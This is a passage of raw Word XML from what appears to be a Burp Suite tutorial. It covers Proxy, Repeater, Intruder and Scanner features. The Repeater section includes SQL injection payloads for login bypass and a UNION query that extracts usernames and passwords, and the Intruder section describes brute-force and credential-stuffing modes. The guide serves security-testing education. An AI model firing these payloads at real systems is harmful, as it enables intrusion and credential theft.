            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Intercept Client Requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Rules to auto-intercept or pass through based on method, URL, file extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Intercept Server Responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Intercept responses matching rules — useful to modify HTML/JS before browser renders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Match and Replace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Automatically modify request/response content using regex — e.g. replace User-Agent headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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TLS Pass Through</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Bypass TLS for specific hosts (e.g. HSTS-pinned mobile APIs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Invisible Proxying</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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For clients that don't support explicit proxy settings (non-browser apps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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2.2  Repeater — Manual Request Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater lets you manually craft, modify and resend individual HTTP requests and observe responses. It is your primary tool for manual exploitation — testing payloads one-by-one, confirming vulnerabilities, and building PoCs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Key Repeater Features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Full request editor with syntax highlighting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Request/response diff — highlight what changed between sends</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1, HTTP/2, WebSocket support</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">History tab — navigate back/forward through all sends in a session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspector panel — parsed view of headers, cookies, query params, body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Repeater Workflow Example — Testing SQLi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # 1. In Proxy History, right-click login POST request → Send to Repeater</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # 2. In Repeater, modify the username parameter:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  username=admin' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # 3. Click Send — observe response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # 4. If login bypassed, try UNION-based extraction:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  username=admin' UNION SELECT null,username,password FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="0" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="446688"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # 5. Iterate payloads, confirm in response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2.3  Intruder — Automated Fuzzing Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Intruder automates customised attacks against web application parameters. It is used for brute-forcing credentials, fuzzing for injection points, enumerating resources, and testing all parameter values at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Attack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Attack Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="69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Description &amp; Use Case</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Sniper</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Single payload set; iterates each position one at a time. Best for: parameter fuzzing, single-field brute force</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Battering Ram</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Same payload inserted into ALL positions simultaneously. Best for: same-value attacks (e.g. session fixation)</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Pitchfork</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Multiple payload sets, one per position, iterated in parallel. Best for: credential stuffing (username:password pairs)</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Cluster Bomb</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Multiple payload sets — tests every combination. Best for: two-variable brute force. Slow but thorough</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Payload Types</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple list — custom wordlist (e.g. rockyou.txt, SecLists)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Runtime file — stream from file during attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Numbers — sequential/random number ranges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute forcer — character-set based enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Character substitution — leet-speak variants of words</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Case modification — lower/upper/title variants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload processing rules — prefix, suffix, encode, hash payloads on-the-fly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Grep — Match &amp; Extract Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Grep Match: flag responses containing strings like 'Invalid password' vs 'Welcome'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Grep Extract: extract values from responses (e.g. CSRF tokens, session IDs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Grep Payloads: identify responses that reflect the payload back (XSS detection)</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2.4  Scanner — Active &amp; Passive Vulnerability Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Scanner is the automated engine that identifies security vulnerabilities. It combines a web crawler, passive traffic analysis, and active probing to surface issues across the OWASP Top 10 and beyond.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Scan Types</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Crawl — maps application structure, discovers all endpoints, forms, and parameters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit (Active) — actively probes each input with attack payloads; may cause side effects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive — analyses existing proxied traffic without sending extra requests; zero noise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Scan Configurations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit Optimisation: speed vs thoroughness vs minimise false positives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Issues Reported: select specific vulnerability classes to test for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Insertion Points: headers, cookies, query params, body params, REST path segments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan Limits: max crawl depth, link/request limits, timeout settings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication: configure login macros so scanner can test authenticated areas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Setting Up a Scan with Login Macro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Options → Sessions → Add Macro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record the login flow: navigate to login, fill credentials, submit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Set Session Handling Rule to run macro when entering scan scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test that scanner maintains authenticated state during crawl</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2.5  Burp Collaborator — Out-of-Band Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
